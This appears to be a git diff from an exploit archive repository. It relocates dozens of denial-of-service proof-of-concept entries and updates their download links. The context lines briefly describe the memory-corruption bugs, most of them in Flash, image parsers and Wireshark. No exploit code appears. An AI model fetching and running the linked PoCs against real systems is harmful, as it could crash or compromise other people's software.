rename from platforms/multiple/dos/41421.txt rename to exploits/multiple/dos/41421.txt index 8da668980..0186dde81 100644 --- a/platforms/multiple/dos/41421.txt +++ b/exploits/multiple/dos/41421.txt @@ -4,4 +4,4 @@ The attached fuzzed swf causes stack corruption when it is loaded, likely due to Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41421.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41421.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41422.txt b/exploits/multiple/dos/41422.txt similarity index 84% rename from platforms/multiple/dos/41422.txt rename to exploits/multiple/dos/41422.txt index d58fe9e6b..30c95de10 100644 --- a/platforms/multiple/dos/41422.txt +++ b/exploits/multiple/dos/41422.txt @@ -4,4 +4,4 @@ The attached swf causes a use-after-free in applying bitmap filters. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41422.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41422.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41423.txt b/exploits/multiple/dos/41423.txt similarity index 88% rename from platforms/multiple/dos/41423.txt rename to exploits/multiple/dos/41423.txt index 9fe65f492..a8888ba72 100644 --- a/platforms/multiple/dos/41423.txt +++ b/exploits/multiple/dos/41423.txt @@ -6,4 +6,4 @@ To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/ Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41423.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41423.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41434.html b/exploits/multiple/dos/41434.html similarity index 100% rename from platforms/multiple/dos/41434.html rename to exploits/multiple/dos/41434.html diff --git a/platforms/multiple/dos/41608.txt b/exploits/multiple/dos/41608.txt similarity index 84% rename from platforms/multiple/dos/41608.txt rename to exploits/multiple/dos/41608.txt index 8694369eb..368a324b7 100644 --- a/platforms/multiple/dos/41608.txt +++ b/exploits/multiple/dos/41608.txt @@ -4,4 +4,4 @@ The attached file causes an out-of-bounds read when its metadata is parsed Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41608.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41608.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41609.txt b/exploits/multiple/dos/41609.txt similarity index 86% rename from platforms/multiple/dos/41609.txt rename to exploits/multiple/dos/41609.txt index 4bcc55774..5bb492021 100644 --- a/platforms/multiple/dos/41609.txt +++ b/exploits/multiple/dos/41609.txt @@ -4,4 +4,4 @@ The attached file causes a use-after-free in attaching a MovieClip and applying Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41609.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41609.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41610.txt b/exploits/multiple/dos/41610.txt similarity index 88% rename from platforms/multiple/dos/41610.txt rename to exploits/multiple/dos/41610.txt index dcee7cc5e..830760130 100644 --- a/platforms/multiple/dos/41610.txt +++ b/exploits/multiple/dos/41610.txt @@ -4,4 +4,4 @@ The attached file causes an overflow in heap thumbnailing. To reproduce, place b Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41610.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41610.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41611.txt b/exploits/multiple/dos/41611.txt similarity index 89% rename from platforms/multiple/dos/41611.txt rename to exploits/multiple/dos/41611.txt index 5ddfb3e2a..7f3daa673 100644 --- a/platforms/multiple/dos/41611.txt +++ b/exploits/multiple/dos/41611.txt @@ -4,4 +4,4 @@ The attached file causes heap corruption when decompressing a planar block. To r Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41611.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41611.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41612.txt b/exploits/multiple/dos/41612.txt similarity index 88% rename from platforms/multiple/dos/41612.txt rename to exploits/multiple/dos/41612.txt index 501d7a5e8..03dddea31 100644 --- a/platforms/multiple/dos/41612.txt +++ b/exploits/multiple/dos/41612.txt @@ -4,4 +4,4 @@ There is a heap overflow in AVC header slicing. To reproduce the issue, put the Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41612.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41612.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41660.html b/exploits/multiple/dos/41660.html similarity index 100% rename from platforms/multiple/dos/41660.html rename to exploits/multiple/dos/41660.html diff --git a/platforms/multiple/dos/41668.txt b/exploits/multiple/dos/41668.txt similarity index 96% rename from platforms/multiple/dos/41668.txt rename to exploits/multiple/dos/41668.txt index ea7f11f46..a4e09e317 100644 --- a/platforms/multiple/dos/41668.txt +++ b/exploits/multiple/dos/41668.txt @@ -13,7 +13,7 @@ https://www.onvio.nl/nieuws/cve-2017-6192 POC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41668.png +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41668.png The PoC contains an IHDR chunk size descriptor of 0xFFFFFFF4 diff --git a/platforms/multiple/dos/41669.txt b/exploits/multiple/dos/41669.txt similarity index 98% rename from platforms/multiple/dos/41669.txt rename to exploits/multiple/dos/41669.txt index 05b4d9fec..e1e959767 100644 --- a/platforms/multiple/dos/41669.txt +++ b/exploits/multiple/dos/41669.txt @@ -12,7 +12,7 @@ https://www.onvio.nl/nieuws/cve-2017-6193 POC: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41669.png +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41669.png In the first bytes of the PoC, positions +0x10 through +0x17 are malformed to contain large values: diff --git a/platforms/multiple/dos/41670.txt b/exploits/multiple/dos/41670.txt similarity index 100% rename from platforms/multiple/dos/41670.txt rename to exploits/multiple/dos/41670.txt diff --git a/platforms/multiple/dos/41741.html b/exploits/multiple/dos/41741.html similarity index 100% rename from platforms/multiple/dos/41741.html rename to exploits/multiple/dos/41741.html diff --git a/platforms/multiple/dos/41742.html b/exploits/multiple/dos/41742.html similarity index 100% rename from platforms/multiple/dos/41742.html rename to exploits/multiple/dos/41742.html diff --git a/platforms/multiple/dos/41743.html b/exploits/multiple/dos/41743.html similarity index 100% rename from platforms/multiple/dos/41743.html rename to exploits/multiple/dos/41743.html diff --git a/platforms/multiple/dos/4175.php b/exploits/multiple/dos/4175.php similarity index 100% rename from platforms/multiple/dos/4175.php rename to exploits/multiple/dos/4175.php diff --git a/platforms/multiple/dos/41778.cc b/exploits/multiple/dos/41778.cc similarity index 100% rename from platforms/multiple/dos/41778.cc rename to exploits/multiple/dos/41778.cc diff --git a/platforms/multiple/dos/41792.c b/exploits/multiple/dos/41792.c similarity index 100% rename from platforms/multiple/dos/41792.c rename to exploits/multiple/dos/41792.c diff --git a/platforms/multiple/dos/41793.c b/exploits/multiple/dos/41793.c similarity index 100% rename from platforms/multiple/dos/41793.c rename to exploits/multiple/dos/41793.c diff --git a/platforms/multiple/dos/41794.c b/exploits/multiple/dos/41794.c similarity index 100% rename from platforms/multiple/dos/41794.c rename to exploits/multiple/dos/41794.c diff --git a/platforms/multiple/dos/41796.c b/exploits/multiple/dos/41796.c similarity index 100% rename from platforms/multiple/dos/41796.c rename to exploits/multiple/dos/41796.c diff --git a/platforms/multiple/dos/41807.html b/exploits/multiple/dos/41807.html similarity index 100% rename from platforms/multiple/dos/41807.html rename to exploits/multiple/dos/41807.html diff --git a/platforms/multiple/dos/41809.html b/exploits/multiple/dos/41809.html similarity index 100% rename from platforms/multiple/dos/41809.html rename to exploits/multiple/dos/41809.html diff --git a/platforms/multiple/dos/4181.php b/exploits/multiple/dos/4181.php similarity index 100% rename from platforms/multiple/dos/4181.php rename to exploits/multiple/dos/4181.php diff --git a/platforms/multiple/dos/41810.html b/exploits/multiple/dos/41810.html similarity index 100% rename from platforms/multiple/dos/41810.html rename to exploits/multiple/dos/41810.html diff --git a/platforms/multiple/dos/41811.html b/exploits/multiple/dos/41811.html similarity index 100% rename from platforms/multiple/dos/41811.html rename to exploits/multiple/dos/41811.html diff --git a/platforms/multiple/dos/41812.html b/exploits/multiple/dos/41812.html similarity index 100% rename from platforms/multiple/dos/41812.html rename to exploits/multiple/dos/41812.html diff --git a/platforms/multiple/dos/41813.html b/exploits/multiple/dos/41813.html similarity index 100% rename from platforms/multiple/dos/41813.html rename to exploits/multiple/dos/41813.html diff --git a/platforms/multiple/dos/41814.html b/exploits/multiple/dos/41814.html similarity index 100% rename from platforms/multiple/dos/41814.html rename to exploits/multiple/dos/41814.html diff --git a/platforms/multiple/dos/41867.html b/exploits/multiple/dos/41867.html similarity index 100% rename from platforms/multiple/dos/41867.html rename to exploits/multiple/dos/41867.html diff --git a/platforms/multiple/dos/41868.html b/exploits/multiple/dos/41868.html similarity index 100% rename from platforms/multiple/dos/41868.html rename to exploits/multiple/dos/41868.html diff --git a/platforms/multiple/dos/41869.html b/exploits/multiple/dos/41869.html similarity index 100% rename from platforms/multiple/dos/41869.html rename to exploits/multiple/dos/41869.html diff --git a/platforms/multiple/dos/41905.txt b/exploits/multiple/dos/41905.txt similarity index 96% rename from platforms/multiple/dos/41905.txt rename to exploits/multiple/dos/41905.txt index c750f8a6d..0b6ac3126 100644 --- a/platforms/multiple/dos/41905.txt +++ b/exploits/multiple/dos/41905.txt @@ -63,4 +63,4 @@ issue: "/** @todo validate this EMT claim... GVM knows. */") Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41905.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41905.zip \ No newline at end of file diff --git a/platforms/multiple/dos/41906.txt b/exploits/multiple/dos/41906.txt similarity index 100% rename from platforms/multiple/dos/41906.txt rename to exploits/multiple/dos/41906.txt diff --git a/platforms/multiple/dos/41931.html b/exploits/multiple/dos/41931.html similarity index 100% rename from platforms/multiple/dos/41931.html rename to exploits/multiple/dos/41931.html diff --git a/platforms/multiple/dos/41932.cpp b/exploits/multiple/dos/41932.cpp similarity index 100% rename from platforms/multiple/dos/41932.cpp rename to exploits/multiple/dos/41932.cpp diff --git a/platforms/multiple/dos/41954.py b/exploits/multiple/dos/41954.py similarity index 100% rename from platforms/multiple/dos/41954.py rename to exploits/multiple/dos/41954.py diff --git a/platforms/multiple/dos/4196.c b/exploits/multiple/dos/4196.c similarity index 100% rename from platforms/multiple/dos/4196.c rename to exploits/multiple/dos/4196.c diff --git a/platforms/multiple/dos/41984.txt b/exploits/multiple/dos/41984.txt similarity index 100% rename from platforms/multiple/dos/41984.txt rename to exploits/multiple/dos/41984.txt diff --git a/platforms/multiple/dos/41993.py b/exploits/multiple/dos/41993.py similarity index 100% rename from platforms/multiple/dos/41993.py rename to exploits/multiple/dos/41993.py diff --git a/platforms/multiple/dos/42017.txt b/exploits/multiple/dos/42017.txt similarity index 84% rename from platforms/multiple/dos/42017.txt rename to exploits/multiple/dos/42017.txt index 9ade03a77..2cf21f4f5 100644 --- a/platforms/multiple/dos/42017.txt +++ b/exploits/multiple/dos/42017.txt @@ -4,4 +4,4 @@ The attached swf triggers an out-of-bounds read in AVC deblocking. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42017.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42017.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42018.txt b/exploits/multiple/dos/42018.txt similarity index 86% rename from platforms/multiple/dos/42018.txt rename to exploits/multiple/dos/42018.txt index df64c4684..5eb97758b 100644 --- a/platforms/multiple/dos/42018.txt +++ b/exploits/multiple/dos/42018.txt @@ -4,4 +4,4 @@ The attached fuzzed swf causes a crash due to heap corruption when processing th Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42018.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42018.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42019.txt b/exploits/multiple/dos/42019.txt similarity index 85% rename from platforms/multiple/dos/42019.txt rename to exploits/multiple/dos/42019.txt index 1586a62cd..4a07b0b3e 100644 --- a/platforms/multiple/dos/42019.txt +++ b/exploits/multiple/dos/42019.txt @@ -4,4 +4,4 @@ The attached swf causes an out-of-bounds read in getting the width of a TextFiel Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42019.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42019.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42027.html b/exploits/multiple/dos/42027.html similarity index 100% rename from platforms/multiple/dos/42027.html rename to exploits/multiple/dos/42027.html diff --git a/platforms/multiple/dos/42049.txt b/exploits/multiple/dos/42049.txt similarity index 97% rename from platforms/multiple/dos/42049.txt rename to exploits/multiple/dos/42049.txt index f7ba8a58a..3286c0db0 100644 --- a/platforms/multiple/dos/42049.txt +++ b/exploits/multiple/dos/42049.txt @@ -76,4 +76,4 @@ Binary file PhotoData/FacesMetadata/NVP_HIDDENFACES.hiddenfacemetadata matches Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42049.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42049.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42050.txt b/exploits/multiple/dos/42050.txt similarity index 93% rename from platforms/multiple/dos/42050.txt rename to exploits/multiple/dos/42050.txt index 01c7d26e7..786b5d81e 100644 --- a/platforms/multiple/dos/42050.txt +++ b/exploits/multiple/dos/42050.txt @@ -12,4 +12,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42050.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42050.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42051.txt b/exploits/multiple/dos/42051.txt similarity index 96% rename from platforms/multiple/dos/42051.txt rename to exploits/multiple/dos/42051.txt index 4b6c4cf11..13ee2cf4c 100644 --- a/platforms/multiple/dos/42051.txt +++ b/exploits/multiple/dos/42051.txt @@ -41,4 +41,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42051.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42051.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42052.txt b/exploits/multiple/dos/42052.txt similarity index 92% rename from platforms/multiple/dos/42052.txt rename to exploits/multiple/dos/42052.txt index 0b9148d0f..39d7cb33e 100644 --- a/platforms/multiple/dos/42052.txt +++ b/exploits/multiple/dos/42052.txt @@ -17,4 +17,4 @@ tested on MacOS 10.12.3 (16D32) Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42052.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42052.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42054.c b/exploits/multiple/dos/42054.c similarity index 100% rename from platforms/multiple/dos/42054.c rename to exploits/multiple/dos/42054.c diff --git a/platforms/multiple/dos/42055.c b/exploits/multiple/dos/42055.c similarity index 100% rename from platforms/multiple/dos/42055.c rename to exploits/multiple/dos/42055.c diff --git a/platforms/multiple/dos/42063.html b/exploits/multiple/dos/42063.html similarity index 100% rename from platforms/multiple/dos/42063.html rename to exploits/multiple/dos/42063.html diff --git a/platforms/multiple/dos/42070.c b/exploits/multiple/dos/42070.c similarity index 100% rename from platforms/multiple/dos/42070.c rename to exploits/multiple/dos/42070.c diff --git a/platforms/multiple/dos/42071.html b/exploits/multiple/dos/42071.html similarity index 100% rename from platforms/multiple/dos/42071.html rename to exploits/multiple/dos/42071.html diff --git a/platforms/multiple/dos/42072.html b/exploits/multiple/dos/42072.html similarity index 100% rename from platforms/multiple/dos/42072.html rename to exploits/multiple/dos/42072.html diff --git a/platforms/multiple/dos/42104.js b/exploits/multiple/dos/42104.js similarity index 100% rename from platforms/multiple/dos/42104.js rename to exploits/multiple/dos/42104.js diff --git a/platforms/multiple/dos/42108.html b/exploits/multiple/dos/42108.html similarity index 100% rename from platforms/multiple/dos/42108.html rename to exploits/multiple/dos/42108.html diff --git a/platforms/multiple/dos/42123.txt b/exploits/multiple/dos/42123.txt similarity index 97% rename from platforms/multiple/dos/42123.txt rename to exploits/multiple/dos/42123.txt index ccce5ce87..fb95a710d 100644 --- a/platforms/multiple/dos/42123.txt +++ b/exploits/multiple/dos/42123.txt @@ -63,4 +63,4 @@ SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42123.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42123.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42124.txt b/exploits/multiple/dos/42124.txt similarity index 97% rename from platforms/multiple/dos/42124.txt rename to exploits/multiple/dos/42124.txt index 9aa5ada99..b7d3a256d 100644 --- a/platforms/multiple/dos/42124.txt +++ b/exploits/multiple/dos/42124.txt @@ -83,4 +83,4 @@ SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42124.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42124.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42188.html b/exploits/multiple/dos/42188.html similarity index 100% rename from platforms/multiple/dos/42188.html rename to exploits/multiple/dos/42188.html diff --git a/platforms/multiple/dos/42189.html b/exploits/multiple/dos/42189.html similarity index 100% rename from platforms/multiple/dos/42189.html rename to exploits/multiple/dos/42189.html diff --git a/platforms/multiple/dos/42190.html b/exploits/multiple/dos/42190.html similarity index 100% rename from platforms/multiple/dos/42190.html rename to exploits/multiple/dos/42190.html diff --git a/platforms/multiple/dos/42191.html b/exploits/multiple/dos/42191.html similarity index 100% rename from platforms/multiple/dos/42191.html rename to exploits/multiple/dos/42191.html diff --git a/platforms/multiple/dos/42245.txt b/exploits/multiple/dos/42245.txt similarity index 96% rename from platforms/multiple/dos/42245.txt rename to exploits/multiple/dos/42245.txt index 858b46940..4ec613c2b 100644 --- a/platforms/multiple/dos/42245.txt +++ b/exploits/multiple/dos/42245.txt @@ -49,4 +49,4 @@ of their codebase which removed further issues. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42245.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42245.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42247.txt b/exploits/multiple/dos/42247.txt similarity index 84% rename from platforms/multiple/dos/42247.txt rename to exploits/multiple/dos/42247.txt index c9f389353..49929ae2f 100644 --- a/platforms/multiple/dos/42247.txt +++ b/exploits/multiple/dos/42247.txt @@ -4,4 +4,4 @@ The attached file causes an out-of-bounds read in avc edge processing. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42247.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42247.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42248.txt b/exploits/multiple/dos/42248.txt similarity index 89% rename from platforms/multiple/dos/42248.txt rename to exploits/multiple/dos/42248.txt index d1e90d913..7d3e52128 100644 --- a/platforms/multiple/dos/42248.txt +++ b/exploits/multiple/dos/42248.txt @@ -6,4 +6,4 @@ http://127.0.0.1/LoadImage.swf=read1.png Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42248.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42248.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42249.txt b/exploits/multiple/dos/42249.txt similarity index 89% rename from platforms/multiple/dos/42249.txt rename to exploits/multiple/dos/42249.txt index ab643de6d..b35adda77 100644 --- a/platforms/multiple/dos/42249.txt +++ b/exploits/multiple/dos/42249.txt @@ -4,4 +4,4 @@ The attached file causes heap corruption in the ATF parser. To reproduce the iss Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42249.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42249.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42260.py b/exploits/multiple/dos/42260.py similarity index 100% rename from platforms/multiple/dos/42260.py rename to exploits/multiple/dos/42260.py diff --git a/platforms/multiple/dos/42286.txt b/exploits/multiple/dos/42286.txt similarity index 94% rename from platforms/multiple/dos/42286.txt rename to exploits/multiple/dos/42286.txt index d4111cddc..6448bfc72 100644 --- a/platforms/multiple/dos/42286.txt +++ b/exploits/multiple/dos/42286.txt @@ -19,4 +19,4 @@ This PoC crashes on google-chrome-beta on Linux. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42286.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42286.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42294.py b/exploits/multiple/dos/42294.py similarity index 100% rename from platforms/multiple/dos/42294.py rename to exploits/multiple/dos/42294.py diff --git a/platforms/multiple/dos/42360.html b/exploits/multiple/dos/42360.html similarity index 100% rename from platforms/multiple/dos/42360.html rename to exploits/multiple/dos/42360.html diff --git a/platforms/multiple/dos/42361.html b/exploits/multiple/dos/42361.html similarity index 100% rename from platforms/multiple/dos/42361.html rename to exploits/multiple/dos/42361.html diff --git a/platforms/multiple/dos/42362.html b/exploits/multiple/dos/42362.html similarity index 100% rename from platforms/multiple/dos/42362.html rename to exploits/multiple/dos/42362.html diff --git a/platforms/multiple/dos/42363.html b/exploits/multiple/dos/42363.html similarity index 100% rename from platforms/multiple/dos/42363.html rename to exploits/multiple/dos/42363.html diff --git a/platforms/multiple/dos/42364.html b/exploits/multiple/dos/42364.html similarity index 100% rename from platforms/multiple/dos/42364.html rename to exploits/multiple/dos/42364.html diff --git a/platforms/multiple/dos/42365.html b/exploits/multiple/dos/42365.html similarity index 100% rename from platforms/multiple/dos/42365.html rename to exploits/multiple/dos/42365.html diff --git a/platforms/multiple/dos/42366.html b/exploits/multiple/dos/42366.html similarity index 100% rename from platforms/multiple/dos/42366.html rename to exploits/multiple/dos/42366.html diff --git a/platforms/multiple/dos/42367.html b/exploits/multiple/dos/42367.html similarity index 100% rename from platforms/multiple/dos/42367.html rename to exploits/multiple/dos/42367.html diff --git a/platforms/multiple/dos/42373.html b/exploits/multiple/dos/42373.html similarity index 100% rename from platforms/multiple/dos/42373.html rename to exploits/multiple/dos/42373.html diff --git a/platforms/multiple/dos/42374.html b/exploits/multiple/dos/42374.html similarity index 100% rename from platforms/multiple/dos/42374.html rename to exploits/multiple/dos/42374.html diff --git a/platforms/multiple/dos/42375.html b/exploits/multiple/dos/42375.html similarity index 100% rename from platforms/multiple/dos/42375.html rename to exploits/multiple/dos/42375.html diff --git a/platforms/multiple/dos/42376.html b/exploits/multiple/dos/42376.html similarity index 100% rename from platforms/multiple/dos/42376.html rename to exploits/multiple/dos/42376.html diff --git a/platforms/multiple/dos/42377.txt b/exploits/multiple/dos/42377.txt similarity index 100% rename from platforms/multiple/dos/42377.txt rename to exploits/multiple/dos/42377.txt diff --git a/platforms/multiple/dos/4249.rb b/exploits/multiple/dos/4249.rb similarity index 100% rename from platforms/multiple/dos/4249.rb rename to exploits/multiple/dos/4249.rb diff --git a/platforms/multiple/dos/4260.php b/exploits/multiple/dos/4260.php similarity index 100% rename from platforms/multiple/dos/4260.php rename to exploits/multiple/dos/4260.php diff --git a/platforms/multiple/dos/42602.html b/exploits/multiple/dos/42602.html similarity index 100% rename from platforms/multiple/dos/42602.html rename to exploits/multiple/dos/42602.html diff --git a/platforms/multiple/dos/42604.html b/exploits/multiple/dos/42604.html similarity index 100% rename from platforms/multiple/dos/42604.html rename to exploits/multiple/dos/42604.html diff --git a/platforms/multiple/dos/42666.txt b/exploits/multiple/dos/42666.txt similarity index 100% rename from platforms/multiple/dos/42666.txt rename to exploits/multiple/dos/42666.txt diff --git a/platforms/multiple/dos/42781.txt b/exploits/multiple/dos/42781.txt similarity index 85% rename from platforms/multiple/dos/42781.txt rename to exploits/multiple/dos/42781.txt index 2634d0f12..9021e722b 100644 --- a/platforms/multiple/dos/42781.txt +++ b/exploits/multiple/dos/42781.txt @@ -5,4 +5,4 @@ The attached MP4 file causes an out-of-bounds memory access when played in flash Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42781.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42781.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42782.txt b/exploits/multiple/dos/42782.txt similarity index 85% rename from platforms/multiple/dos/42782.txt rename to exploits/multiple/dos/42782.txt index 28e65c586..0c57d0b43 100644 --- a/platforms/multiple/dos/42782.txt +++ b/exploits/multiple/dos/42782.txt @@ -5,4 +5,4 @@ The attached fuzzed MP4 file causes an out-of-bounds memory access when played w Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42782.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42782.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42783.txt b/exploits/multiple/dos/42783.txt similarity index 85% rename from platforms/multiple/dos/42783.txt rename to exploits/multiple/dos/42783.txt index 34827ea97..0ce9af8b8 100644 --- a/platforms/multiple/dos/42783.txt +++ b/exploits/multiple/dos/42783.txt @@ -5,4 +5,4 @@ The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42783.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42783.zip \ No newline at end of file diff --git a/platforms/multiple/dos/42941.py b/exploits/multiple/dos/42941.py similarity index 100% rename from platforms/multiple/dos/42941.py rename to exploits/multiple/dos/42941.py diff --git a/platforms/multiple/dos/42942.py b/exploits/multiple/dos/42942.py similarity index 100% rename from platforms/multiple/dos/42942.py rename to exploits/multiple/dos/42942.py diff --git a/platforms/multiple/dos/42943.py b/exploits/multiple/dos/42943.py similarity index 100% rename from platforms/multiple/dos/42943.py rename to exploits/multiple/dos/42943.py diff --git a/platforms/multiple/dos/42944.py b/exploits/multiple/dos/42944.py similarity index 100% rename from platforms/multiple/dos/42944.py rename to exploits/multiple/dos/42944.py diff --git a/platforms/multiple/dos/42945.py b/exploits/multiple/dos/42945.py similarity index 100% rename from platforms/multiple/dos/42945.py rename to exploits/multiple/dos/42945.py diff --git a/platforms/multiple/dos/42946.py b/exploits/multiple/dos/42946.py similarity index 100% rename from platforms/multiple/dos/42946.py rename to exploits/multiple/dos/42946.py diff --git a/platforms/multiple/dos/42955.html b/exploits/multiple/dos/42955.html similarity index 100% rename from platforms/multiple/dos/42955.html rename to exploits/multiple/dos/42955.html diff --git a/platforms/multiple/dos/42969.rb b/exploits/multiple/dos/42969.rb similarity index 100% rename from platforms/multiple/dos/42969.rb rename to exploits/multiple/dos/42969.rb diff --git a/platforms/multiple/dos/43020.txt b/exploits/multiple/dos/43020.txt similarity index 100% rename from platforms/multiple/dos/43020.txt rename to exploits/multiple/dos/43020.txt diff --git a/platforms/multiple/dos/43111.py b/exploits/multiple/dos/43111.py similarity index 100% rename from platforms/multiple/dos/43111.py rename to exploits/multiple/dos/43111.py diff --git a/platforms/multiple/dos/43133.php b/exploits/multiple/dos/43133.php similarity index 100% rename from platforms/multiple/dos/43133.php rename to exploits/multiple/dos/43133.php diff --git a/platforms/multiple/dos/43166.js b/exploits/multiple/dos/43166.js similarity index 100% rename from platforms/multiple/dos/43166.js rename to exploits/multiple/dos/43166.js diff --git a/platforms/multiple/dos/43167.js b/exploits/multiple/dos/43167.js similarity index 100% rename from platforms/multiple/dos/43167.js rename to exploits/multiple/dos/43167.js diff --git a/platforms/multiple/dos/43168.js b/exploits/multiple/dos/43168.js similarity index 100% rename from platforms/multiple/dos/43168.js rename to exploits/multiple/dos/43168.js diff --git a/platforms/multiple/dos/43169.js b/exploits/multiple/dos/43169.js similarity index 100% rename from platforms/multiple/dos/43169.js rename to exploits/multiple/dos/43169.js diff --git a/platforms/multiple/dos/43170.js b/exploits/multiple/dos/43170.js similarity index 100% rename from platforms/multiple/dos/43170.js rename to exploits/multiple/dos/43170.js diff --git a/platforms/multiple/dos/43171.js b/exploits/multiple/dos/43171.js similarity index 100% rename from platforms/multiple/dos/43171.js rename to exploits/multiple/dos/43171.js diff --git a/platforms/multiple/dos/43172.js b/exploits/multiple/dos/43172.js similarity index 100% rename from platforms/multiple/dos/43172.js rename to exploits/multiple/dos/43172.js diff --git a/platforms/multiple/dos/43173.html b/exploits/multiple/dos/43173.html similarity index 100% rename from platforms/multiple/dos/43173.html rename to exploits/multiple/dos/43173.html diff --git a/platforms/multiple/dos/43174.html 